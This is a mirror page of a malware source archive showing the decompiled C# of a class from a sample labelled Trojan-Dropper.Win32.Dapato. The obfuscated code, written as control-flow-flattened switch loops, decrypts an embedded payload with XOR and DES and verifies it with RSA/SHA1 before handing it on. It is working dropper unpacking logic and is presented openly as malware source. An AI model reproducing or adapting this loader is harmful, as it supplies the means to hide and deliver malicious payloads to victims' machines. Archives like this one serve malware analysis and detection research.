mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
420 lines
9.7 KiB
C#
420 lines
9.7 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: l
|
|
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
|
|
|
|
using System;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
using System.Security.Cryptography;
|
|
|
|
internal sealed class l
|
|
{
|
|
private const int a = 8;
|
|
private const int b = 20;
|
|
private const int c = 4;
|
|
private static byte[] d = new byte[4];
|
|
private static byte[] e;
|
|
|
|
static l()
|
|
{
|
|
label_2:
|
|
int num = 0;
|
|
while (true)
|
|
{
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
l.e = new byte[4];
|
|
num = 4;
|
|
continue;
|
|
case 1:
|
|
l.d[1] = l.e[1] = (byte) 83;
|
|
num = 3;
|
|
continue;
|
|
case 2:
|
|
l.e[3] = (byte) 50;
|
|
num = 6;
|
|
continue;
|
|
case 3:
|
|
l.d[2] = l.e[2] = (byte) 65;
|
|
num = 5;
|
|
continue;
|
|
case 4:
|
|
l.d[0] = l.e[0] = (byte) 82;
|
|
num = 1;
|
|
continue;
|
|
case 5:
|
|
l.d[3] = (byte) 49;
|
|
num = 2;
|
|
continue;
|
|
case 6:
|
|
goto label_9;
|
|
default:
|
|
goto label_2;
|
|
}
|
|
}
|
|
label_9:;
|
|
}
|
|
|
|
public static MemoryStream a(Stream a)
|
|
{
|
|
BinaryReader binaryReader1 = new BinaryReader(a);
|
|
DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
|
|
bool flag1 = binaryReader1.ReadBoolean();
|
|
int count1 = (int) binaryReader1.ReadUInt16();
|
|
byte[] buffer1 = new byte[count1];
|
|
binaryReader1.Read(buffer1, 0, count1);
|
|
if ((!flag1 ? 1 : 0) == 0)
|
|
{
|
|
byte[] buffer2 = new byte[8];
|
|
binaryReader1.Read(buffer2, 0, 8);
|
|
for (int index = 0; index < count1; ++index)
|
|
buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]);
|
|
}
|
|
BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false));
|
|
label_6:
|
|
int num = 7;
|
|
int count2;
|
|
int count3;
|
|
bool flag2;
|
|
byte[] numArray1;
|
|
byte[] buffer3;
|
|
bool flag3;
|
|
while (true)
|
|
{
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
count2 = (int) binaryReader2.ReadByte();
|
|
num = 3;
|
|
continue;
|
|
case 1:
|
|
count3 = (int) binaryReader2.ReadByte();
|
|
num = 8;
|
|
continue;
|
|
case 2:
|
|
flag2 = binaryReader2.ReadBoolean();
|
|
num = 0;
|
|
continue;
|
|
case 3:
|
|
numArray1 = new byte[count2];
|
|
num = 4;
|
|
continue;
|
|
case 4:
|
|
if (flag2)
|
|
{
|
|
num = 10;
|
|
continue;
|
|
}
|
|
goto label_19;
|
|
case 5:
|
|
binaryReader2.Read(buffer3, 0, count3);
|
|
num = 6;
|
|
continue;
|
|
case 6:
|
|
cryptoServiceProvider.IV = buffer3;
|
|
num = 2;
|
|
continue;
|
|
case 7:
|
|
binaryReader2.ReadString();
|
|
num = 9;
|
|
continue;
|
|
case 8:
|
|
buffer3 = new byte[count3];
|
|
num = 5;
|
|
continue;
|
|
case 9:
|
|
flag3 = binaryReader2.ReadBoolean();
|
|
num = 1;
|
|
continue;
|
|
case 10:
|
|
goto label_18;
|
|
default:
|
|
goto label_6;
|
|
}
|
|
}
|
|
label_18:
|
|
binaryReader2.Read(numArray1, 0, count2);
|
|
label_19:
|
|
RSACryptoServiceProvider a1 = (RSACryptoServiceProvider) null;
|
|
int count4 = binaryReader2.ReadInt32();
|
|
byte[] numArray2 = new byte[count4];
|
|
binaryReader2.Read(numArray2, 0, count4);
|
|
if (!flag2)
|
|
{
|
|
byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
|
|
if (publicKey == null || publicKey.Length != 160)
|
|
throw new InvalidOperationException();
|
|
Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray1, 0, count2);
|
|
numArray1[5] |= (byte) 128;
|
|
a1 = new RSACryptoServiceProvider();
|
|
a1.ImportParameters(l.a(publicKey));
|
|
}
|
|
cryptoServiceProvider.Key = numArray1;
|
|
MemoryStream a2 = new MemoryStream();
|
|
using (CryptoStream a3 = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Read))
|
|
{
|
|
if (flag3)
|
|
j.a((Stream) a3, (Stream) a2);
|
|
else
|
|
l.a((Stream) a3, (Stream) a2);
|
|
}
|
|
if (a1 != null)
|
|
{
|
|
a2.Position = 0L;
|
|
if (!l.a(a1, (Stream) a2, numArray2))
|
|
throw new InvalidOperationException();
|
|
}
|
|
a2.Position = 0L;
|
|
return a2;
|
|
}
|
|
|
|
private static byte[] a(byte[] a1, int a2, int a3)
|
|
{
|
|
if ((a1 == null ? 1 : 0) == 0)
|
|
{
|
|
label_2:
|
|
int num = 0;
|
|
while (true)
|
|
{
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
if (a1.Length < a2 + a3)
|
|
{
|
|
num = 1;
|
|
continue;
|
|
}
|
|
goto label_6;
|
|
case 1:
|
|
goto label_5;
|
|
default:
|
|
goto label_2;
|
|
}
|
|
}
|
|
label_6:
|
|
byte[] destinationArray = new byte[a3];
|
|
Array.Copy((Array) a1, a2, (Array) destinationArray, 0, a3);
|
|
return destinationArray;
|
|
}
|
|
label_5:
|
|
return (byte[]) null;
|
|
}
|
|
|
|
private static void a(Stream a1, Stream a2)
|
|
{
|
|
byte[] buffer = new byte[4096];
|
|
while (true)
|
|
{
|
|
int count = a1.Read(buffer, 0, buffer.Length);
|
|
if ((count <= 0 ? 0 : 1) != 0)
|
|
a2.Write(buffer, 0, count);
|
|
else
|
|
break;
|
|
}
|
|
}
|
|
|
|
private static RSAParameters a(byte[] a)
|
|
{
|
|
bool flag = a.Length == 160;
|
|
if ((!flag ? 1 : 0) == 0 && !l.a(a, l.d, 20))
|
|
return new RSAParameters();
|
|
if (!flag && !l.a(a, l.e, 8))
|
|
return new RSAParameters();
|
|
RSAParameters rsaParameters = new RSAParameters();
|
|
int a1 = (flag ? 20 : 8) + 8;
|
|
int a2 = 4;
|
|
rsaParameters.Exponent = l.a(a, a1, a2);
|
|
Array.Reverse((Array) rsaParameters.Exponent);
|
|
int a3 = a1 + a2;
|
|
int a4 = 128;
|
|
rsaParameters.Modulus = l.a(a, a3, a4);
|
|
Array.Reverse((Array) rsaParameters.Modulus);
|
|
if (flag)
|
|
return rsaParameters;
|
|
int a5 = a3 + a4;
|
|
label_8:
|
|
int num = 14;
|
|
while (true)
|
|
{
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
rsaParameters.P = l.a(a, a5, a4);
|
|
num = 12;
|
|
continue;
|
|
case 1:
|
|
rsaParameters.DQ = l.a(a, a5, a4);
|
|
num = 6;
|
|
continue;
|
|
case 2:
|
|
a5 += a4;
|
|
num = 15;
|
|
continue;
|
|
case 3:
|
|
rsaParameters.D = l.a(a, a5, a4);
|
|
num = 10;
|
|
continue;
|
|
case 4:
|
|
a5 += a4;
|
|
num = 7;
|
|
continue;
|
|
case 5:
|
|
rsaParameters.InverseQ = l.a(a, a5, a4);
|
|
num = 9;
|
|
continue;
|
|
case 6:
|
|
Array.Reverse((Array) rsaParameters.DQ);
|
|
num = 2;
|
|
continue;
|
|
case 7:
|
|
a4 = 64;
|
|
num = 1;
|
|
continue;
|
|
case 8:
|
|
a4 = 64;
|
|
num = 17;
|
|
continue;
|
|
case 9:
|
|
Array.Reverse((Array) rsaParameters.InverseQ);
|
|
num = 13;
|
|
continue;
|
|
case 10:
|
|
Array.Reverse((Array) rsaParameters.D);
|
|
num = 23;
|
|
continue;
|
|
case 11:
|
|
Array.Reverse((Array) rsaParameters.DP);
|
|
num = 4;
|
|
continue;
|
|
case 12:
|
|
Array.Reverse((Array) rsaParameters.P);
|
|
num = 16;
|
|
continue;
|
|
case 13:
|
|
a5 += a4;
|
|
num = 19;
|
|
continue;
|
|
case 14:
|
|
a4 = 64;
|
|
num = 0;
|
|
continue;
|
|
case 15:
|
|
a4 = 64;
|
|
num = 5;
|
|
continue;
|
|
case 16:
|
|
a5 += a4;
|
|
num = 21;
|
|
continue;
|
|
case 17:
|
|
rsaParameters.DP = l.a(a, a5, a4);
|
|
num = 11;
|
|
continue;
|
|
case 18:
|
|
rsaParameters.Q = l.a(a, a5, a4);
|
|
num = 20;
|
|
continue;
|
|
case 19:
|
|
a4 = 128;
|
|
num = 3;
|
|
continue;
|
|
case 20:
|
|
Array.Reverse((Array) rsaParameters.Q);
|
|
num = 22;
|
|
continue;
|
|
case 21:
|
|
a4 = 64;
|
|
num = 18;
|
|
continue;
|
|
case 22:
|
|
a5 += a4;
|
|
num = 8;
|
|
continue;
|
|
case 23:
|
|
goto label_32;
|
|
default:
|
|
goto label_8;
|
|
}
|
|
}
|
|
label_32:
|
|
return rsaParameters;
|
|
}
|
|
|
|
private static bool a(byte[] a1, byte[] a2, int a3)
|
|
{
|
|
int index = 0;
|
|
if ((index == 0 ? 1 : 0) != 0)
|
|
goto label_7;
|
|
else
|
|
goto label_2;
|
|
label_1:
|
|
int num;
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
goto label_3;
|
|
case 1:
|
|
return false;
|
|
}
|
|
label_2:
|
|
num = 0;
|
|
goto label_1;
|
|
label_3:
|
|
if ((int) a1[index + a3] != (int) a2[index])
|
|
{
|
|
num = 1;
|
|
goto label_1;
|
|
}
|
|
else
|
|
++index;
|
|
label_7:
|
|
if (index >= a2.Length)
|
|
return true;
|
|
goto label_3;
|
|
}
|
|
|
|
private static bool a(RSACryptoServiceProvider a1, Stream a2, byte[] a3)
|
|
{
|
|
SHA1CryptoServiceProvider cryptoServiceProvider = new SHA1CryptoServiceProvider();
|
|
label_2:
|
|
int num = 0;
|
|
byte[] hash;
|
|
string name;
|
|
while (true)
|
|
{
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
hash = cryptoServiceProvider.ComputeHash(a2);
|
|
num = 3;
|
|
continue;
|
|
case 1:
|
|
name += (string) (object) 'A';
|
|
num = 4;
|
|
continue;
|
|
case 2:
|
|
name += (string) (object) 'H';
|
|
num = 1;
|
|
continue;
|
|
case 3:
|
|
name = new string('S', 1);
|
|
num = 2;
|
|
continue;
|
|
case 4:
|
|
name += (string) (object) '1';
|
|
num = 5;
|
|
continue;
|
|
case 5:
|
|
goto label_8;
|
|
default:
|
|
goto label_2;
|
|
}
|
|
}
|
|
label_8:
|
|
return a1.VerifyHash(hash, CryptoConfig.MapNameToOID(name), a3);
|
|
}
|
|
}
|